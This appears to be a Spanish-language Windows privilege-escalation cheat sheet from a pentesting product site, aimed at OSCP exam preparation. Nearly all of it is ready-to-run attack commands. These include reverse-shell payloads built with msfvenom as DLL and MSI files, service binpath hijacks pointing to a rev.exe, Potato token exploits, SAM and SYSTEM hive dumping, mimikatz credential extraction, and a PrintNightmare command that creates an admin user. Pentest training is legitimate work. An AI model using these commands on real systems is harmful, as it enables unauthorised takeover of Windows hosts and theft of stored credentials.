# Enumeración inicial
Conoce tu contexto antes de tocar un exploit: quién eres, tus privilegios, el nivel de parches y qué hay instalado.
whoami /privwhoami /groupssysteminfonet user; net localgroup administratorswmic qfe get HotFixID,InstalledOnnetstat -ano# Privilegios de token peligrosos
Ciertos privilegios son una vía directa a SYSTEM. Enumera con whoami /priv y contrasta con esta tabla.
| Privilegio | Explotación |
|---|---|
| SeImpersonate | Ataques Potato (PrintSpoofer, GodPotato) |
| SeAssignPrimaryToken | Ataques Potato |
| SeBackup | Leer las ruches SAM/SYSTEM → volcar hashes |
| SeRestore | Sobrescribir cualquier archivo protegido |
| SeDebug | Inyectar en un proceso SYSTEM |
| SeTakeOwnership | Tomar posesión de cualquier objeto |
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive# Ataques Potato (SeImpersonate)
Las cuentas de servicio (IIS, MSSQL) suelen tener SeImpersonatePrivilege. La familia Potato abusa de ello para convertirse en SYSTEM.
PrintSpoofer.exe -i -c cmdGodPotato.exe -cmd "cmd /c whoami"JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exeiis apppool\defaultapppool o cuenta de servicio MSSQL? Revisa whoami /priv — SeImpersonate casi siempre está.# Servicios mal configurados
Permisos de servicio débiles permiten reemplazar el binario o reconfigurar el servicio para ejecutar tu payload como SYSTEM.
accesschk.exe -uwcqv "Users" *sc qc SERVICE_NAMEsc config SERVICE_NAME binpath= "C:\temp\rev.exe"sc stop SERVICE_NAME && sc start SERVICE_NAMEicacls "C:\Path\To\service.exe"# Rutas de servicio sin comillas
Una ruta de servicio con espacios y sin comillas permite a Windows ejecutar una ruta parcial anterior — deja ahí tu binario.
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """icacls "C:\Program Files\Some Folder\"copy rev.exe "C:\Program Files\Some.exe"# Registro, AutoRuns & DLL Hijacking
Claves de autorun escribibles y fallos en el orden de búsqueda de DLL permiten ejecutar tu código con mayor privilegio.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Runaccesschk.exe -wvu "HKLM\...\Run"msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll# AlwaysInstallElevated
Si esta política está habilitada, cualquier usuario puede instalar un MSI como SYSTEM — victoria inmediata.
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msimsiexec /quiet /qn /i evil.msi# Búsqueda de credenciales
Windows guarda contraseñas en más sitios de los que crees — archivos, registro y memoria.
reg query HKLM /f password /t REG_SZ /sfindstr /si password *.txt *.ini *.config *.xmldir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*cmdkey /listmimikatz "privilege::debug" "sekurlsa::logonpasswords" exit# Exploits de kernel & PrintNightmare
Usa los exploits de kernel como último recurso — haz coincidir el build exacto de systeminfo.
| Exploit | CVE | Objetivo |
|---|---|---|
| PrintNightmare | CVE-2021-1675 / 34527 | Servicio Spooler (la mayoría de Windows) |
| HiveNightmare | CVE-2021-36934 | SAM legible (Win10/11) |
| CVE-2021-40449 | CallbackTable | Win7 – Server 2019 |
| CVE-2020-0787 (BITS) | Movimiento arbitrario de archivo | Win7 – Win10 |
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txtInvoke-Nightmare -NewUser hacker -NewPassword Pass123!# Herramientas de enumeración automatizadas
Automatiza las comprobaciones — pero valida cada hallazgo antes de explotarlo.
.\winPEASx64.exepowershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks".\Seatbelt.exe -group=all.\SharpUp.exe audit❓ FAQ escalada de privilegios Windows
Por la enumeración. Ejecuta whoami /priv y whoami /groups, luego systeminfo para el nivel de parches. WinPEAS ayuda, pero el examen OSCP premia dominar las comprobaciones manuales.
Si tienes SeImpersonatePrivilege (común en cuentas IIS/MSSQL), la familia Potato (PrintSpoofer, GodPotato) abusa de ello para suplantar el token SYSTEM y ejecutarse como NT AUTHORITY\SYSTEM.
Cuando una ruta de servicio tiene espacios y sin comillas, Windows prueba cada ruta parcial. Si puedes escribir en un directorio anterior, tu binario se ejecuta con los privilegios del servicio al iniciarse.
Una política que permite a cualquier usuario instalar MSI como SYSTEM. Si las claves HKLM y HKCU valen 1, crea un MSI malicioso con msfvenom y ejecuta msiexec /quiet /i evil.msi para una shell SYSTEM.
WinPEAS es la herramienta estándar. Alternativas: PowerUp (PowerShell), Seatbelt y Windows Exploit Suggester para parches faltantes. Valida siempre manualmente antes de explotar.
SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (leer SAM), SeRestore, SeDebug y SeTakeOwnership. Comprueba con whoami /priv.
Con SYSTEM, vuelca SAM/LSA con reg save o mimikatz sekurlsa::logonpasswords. También puedes volcar LSASS con procdump/comsvcs.dll y analizarlo offline con pypykatz.
Abusar del orden de búsqueda de DLL: si un programa privilegiado carga una DLL por nombre y puedes escribir en un directorio buscado primero, tu DLL se carga y ejecuta con los privilegios del programa.
📚 Recursos relacionados
- Cheatsheet Escalada de Privilegios Linux — El equivalente Linux: sudo, SUID, capabilities, cron y más
- Cheatsheet Active Directory — Tras SYSTEM en un host, pivota al dominio hacia Domain Admin
- Cheatsheet OSCP — La privesc Windows es parte central del examen OSCP
- Glosario de Pentesting — Token, SID, LSASS, SAM y 60+ términos clave definidos
Convierte tu compromiso SYSTEM en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.
¿Quieres los 12 020+ comandos?
Esta cheatsheet de privesc Windows es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.
Empezar gratis →